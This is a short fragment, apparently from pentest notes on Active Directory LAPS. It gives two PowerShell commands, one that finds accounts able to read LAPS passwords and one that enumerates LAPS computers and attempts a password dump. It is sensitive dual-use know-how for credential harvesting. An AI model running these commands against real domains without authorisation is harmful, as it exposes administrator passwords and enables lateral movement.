# Scans Computer Objects for who has "All Extended Rights" and can read passwords
Find-AdmPwdExtendedRights

# Enumerates computers with the LAPS extension and attempts a password dump
Get-LAPSComputers
```